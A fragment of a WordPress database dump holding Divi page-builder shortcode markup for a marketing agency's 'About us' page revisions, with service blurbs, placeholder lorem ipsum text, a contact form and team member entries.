header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:25:26','2020-08-07 18:25:26','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(528,1,'2020-08-07 18:28:13','2020-08-07 18:28:13','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" 